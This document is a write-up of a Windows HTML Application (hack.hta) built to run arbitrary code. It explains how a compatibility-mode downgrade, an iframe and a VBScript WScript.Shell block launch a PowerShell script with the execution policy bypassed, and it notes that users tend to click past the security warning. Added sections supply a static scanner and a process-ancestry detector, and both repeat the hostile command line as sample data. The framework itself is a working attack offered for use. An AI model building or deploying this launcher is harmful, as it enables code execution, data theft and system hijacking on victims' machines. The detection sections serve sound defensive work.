Framework for a Hypertext Application designed to execute arbitrary code.
Created By: Brad Voris
An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript. The HTML is used to generate the user interface, and the scripting language is used for the program logic. An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application.
The usual file extension of an HTA is .hta.
Source: https://en.wikipedia.org/wiki/HTML_Application
Currently HTAs are still supported on Windows 11 and lower environments.
This means a crafty Hypertext Application can be used to steal information, hijack a system, or disguise itself as a legitimate application, which makes it difficult to detect.
The framework itself is a set of files:
The HTA itself, which is labeled hack.hta.
The fake "search" feature.
The malicious script or executable code.
PIE.js, which we use for backwards compatibility for CSS (more on that in the secret sauce below).
There are several components that together make up the secret sauce:
FIRST:
.HTA extension
This tells Windows that the file is a Hypertext Application.
SECOND:
<HTA:APPLICATION
APPLICATIONNAME="HackToolz"
SCROLL="yes"
SINGLEINSTANCE="yes"
SysMenu="yes"
/>
This is the application information, placed in the header of the HTML, that is used to preload and execute the HTA.
THIRD:
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=7;" />
This meta tag forces Internet Explorer to render the content in IE-7/IE-8 compatibility mode.
This also reduces the security restrictions and allows arbitrary VBScript to run in the browser via my fifth ingredient in the secret sauce. Since this is in the "master page / top level page" of the HTA, all code on the "website" is forced into IE-8/IE-7 compatibility...
FOURTH:
<script type="text/javascript" src="PIE.js"></script>
This JavaScript allows most CSS to work in IE-7. I didn't write this; it can be found here: http://css3pie.com/
FIFTH:
Ah yes, that awful iframe, but with a purpose. You can't actively run VBScript without a bunch of security warnings and code failures unless it's a much older version of IE. What you can do is run VBScript in a targeted iframe and ultimately bypass a lot of security, because the Hypertext Application is "trusted" by the OS.
You will get a security warning when you open the HTA, so it's not totally foolproof, but most people just click past them.
SIXTH:
<SCRIPT LANGUAGE="VBScript">
<!--
' Shell object used to launch the external command
set objShell = CreateObject("WScript.Shell")
strOut=""
sub malscript
  cmdarg="%comspec% /c powershell.exe -ExecutionPolicy bypass -file c:\temp\downloadfileandruncmd.ps1 "
  set objExCmd = objShell.Exec(cmdarg)
  ' capture everything the command wrote to standard output
  strOut=objExCmd.StdOut.ReadAll
  ' turn line breaks into <br> so the output renders inside the page
  Set regEx = New RegExp
  regEx.Pattern = "[\f\n\r\v]+"
  regEx.Global = True
  regEx.Multiline = True
  strOut = regEx.Replace(strOut, "<br>")
  TraceOut.innerHTML= strOut
end sub
'-->
</SCRIPT>
The VBScript that can run ANY command or script. I do mean ANY command. If you've got Python or PowerShell scripts, you can just replace the executable and whatever script parameters are needed. In this case it will execute a malicious PowerShell script and bypass the execution policy.
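The six ingredients above are all visible in the file itself before it ever runs, which is what a defender can key on. The following static triage scanner is an added example, not part of the original framework: it looks for the HTA:APPLICATION header, the X-UA-Compatible downgrade to IE-7/IE-8, a VBScript block, an iframe, the WScript.Shell object, a .Exec/.Run call, %comspec% and a PowerShell execution-policy bypass, and grades a file on how many of them appear together. The two sample documents are constructed for the example (the script path in the suspect sample is a placeholder, not the write-up's own), and the verdict thresholds are an assumption to tune for your environment.

```python
import re

# Static indicators for the HTA structure described above. Each regex maps to a
# named indicator; the strings they look for are the ingredients from the write-up.
INDICATORS = {
    "hta_application_tag": re.compile(r"<\s*HTA:APPLICATION\b", re.I),
    "ie_compat_downgrade": re.compile(
        r'http-equiv\s*=\s*"X-UA-Compatible"[^>]*content\s*=\s*"[^"]*IE=[78]\b', re.I),
    "vbscript_block": re.compile(
        r'<\s*script[^>]*(language\s*=\s*"?vbscript|type\s*=\s*"text/vbscript)', re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I),
    "shell_exec": re.compile(r"\.(Exec|Run)\s*\(", re.I),
    "comspec": re.compile(r"%comspec%", re.I),
    "powershell_bypass": re.compile(
        r"powershell(\.exe)?\b.*-(ExecutionPolicy|ep)\s+bypass", re.I),
}


def triage(text):
    """Return (sorted indicator names found, verdict) for one file's contents."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    found = set(hits)
    # Thresholds are an assumption: an HTA that builds a shell object and
    # executes through it is the pattern the write-up describes.
    if "hta_application_tag" in found and {"wscript_shell", "shell_exec"} <= found:
        verdict = "high"
    elif len(hits) >= 3:
        verdict = "medium"
    elif hits:
        verdict = "low"
    else:
        verdict = "clean"
    return hits, verdict


def triage_file(path, encoding="utf-8", errors="replace"):
    """Convenience wrapper for scanning a file on disk."""
    with open(path, encoding=encoding, errors=errors) as fh:
        return triage(fh.read())


# Constructed sample mirroring the layout of the framework above; the script
# path is a placeholder, not the write-up's own.
SUSPECT_HTA = r'''
<html><head>
<HTA:APPLICATION APPLICATIONNAME="HackToolz" SCROLL="yes" SINGLEINSTANCE="yes" SysMenu="yes" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=7;" />
<script type="text/javascript" src="PIE.js"></script>
</head><body>
<iframe id="runner" src="about:blank"></iframe>
<SCRIPT LANGUAGE="VBScript">
set objShell = CreateObject("WScript.Shell")
cmdarg="%comspec% /c powershell.exe -ExecutionPolicy bypass -file C:\PLACEHOLDER\script.ps1"
set objExCmd = objShell.Exec(cmdarg)
</SCRIPT>
</body></html>
'''

# Constructed benign page with none of the ingredients.
BENIGN_HTML = '''
<html><head><title>Printer deployment</title>
<script type="text/javascript" src="app.js"></script>
</head><body><p>Select a printer.</p></body></html>
'''

if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT_HTA), ("benign", BENIGN_HTML)):
        hits, verdict = triage(sample)
        print(f"{label}: {verdict} {hits}")
```

The scanner is deliberately structural rather than signature-based: renaming hack.hta or changing the PowerShell script path does not change the verdict, because the header tag, the shell object and the Exec call have to be present for the technique to work at all.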
SEVENTH:
BYOMS - Bring your own Malicious Script....
Yes, that's not so hard, and it's easy to construct fake application front ends, even pass them off as websites for man-in-the-middle attacks, code injection, additional hijacking, etc.
This isn't rocket science. It's literally taking legacy functionality that should have been removed a decade ago and exploiting it.
Two of my previous projects, LANMonkey and a printer deployment Hypertext Application, date back to the early 2000s. Both applications used Hypertext Applications as a front-end medium for end users and technicians to troubleshoot and deploy. I took a look at the code a few days ago and decided to mock this up to see if it could still work. Lo and behold....
The best prevention for an exploit like this is simply removing Internet Explorer and MSHTA.exe and blocking HTAs. Hypertext Applications have been around since 1999. Until Microsoft removes this functionality it will remain a vulnerability ripe for exploitation.
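Where MSHTA.exe cannot be removed outright, the behaviour this framework relies on is still detectable at runtime: an .hta opened from a user-writable location, and mshta.exe sitting in the parent chain of cmd.exe or powershell.exe, especially when PowerShell is launched with an execution-policy bypass. The following detection logic is an added example, not part of the framework: it walks a set of process-creation records and flags exactly that chain. The record format (pid, ppid, image, cmdline) is an assumption modelled loosely on process-creation telemetry, and the events are constructed for the example.

```python
import ntpath
import re

# Interpreters that an HTA's VBScript typically hands off to via WScript.Shell.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
BYPASS_RE = re.compile(r"-(executionpolicy|ep)\s+bypass", re.I)
# Assumed user-writable path fragments; extend to match your environment.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\downloads\\")


def basename(image):
    return ntpath.basename(image).lower()


def ancestry(pid, by_pid):
    """Process chain root-first, e.g. ['explorer.exe', 'mshta.exe', 'cmd.exe']."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:      # 'seen' guards against pid reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def detect(events):
    """Map pid -> {'rules': [...], 'chain': [...]} for every event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    alerts = {}
    for e in events:
        name = basename(e["image"])
        cmd = e["cmdline"]
        chain = ancestry(e["pid"], by_pid)
        rules = []
        # mshta.exe launched against an .hta sitting in a user-writable location
        if name == "mshta.exe" and ".hta" in cmd.lower() and any(p in cmd.lower() for p in USER_WRITABLE):
            rules.append("mshta_user_path_hta")
        # a shell or script host whose ancestors include mshta.exe
        if name in SHELLS and "mshta.exe" in chain[:-1]:
            rules.append("shell_spawned_by_mshta")
        # PowerShell told to ignore the execution policy
        if name in {"powershell.exe", "pwsh.exe"} and BYPASS_RE.search(cmd):
            rules.append("execution_policy_bypass")
        if rules:
            alerts[e["pid"]] = {"rules": rules, "chain": chain}
    return alerts


# Constructed process-creation records: an HTA opened from Downloads that spawns
# cmd.exe and then PowerShell, next to an unrelated, benign PowerShell run.
EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 400, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\Downloads\hack.hta"'},
    {"pid": 4188, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell.exe -ExecutionPolicy bypass -file c:\temp\downloadfileandruncmd.ps1"},
    {"pid": 4202, "ppid": 4188, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy bypass -file c:\temp\downloadfileandruncmd.ps1"},
    {"pid": 5000, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for pid, alert in detect(EVENTS).items():
        print(pid, alert["rules"], " -> ".join(alert["chain"]))
```

The parent-chain check is what separates this from a noisy "PowerShell ran" rule: the benign inventory script in the sample is never flagged, while every stage of the HTA-driven chain is, with the full ancestry attached for the analyst.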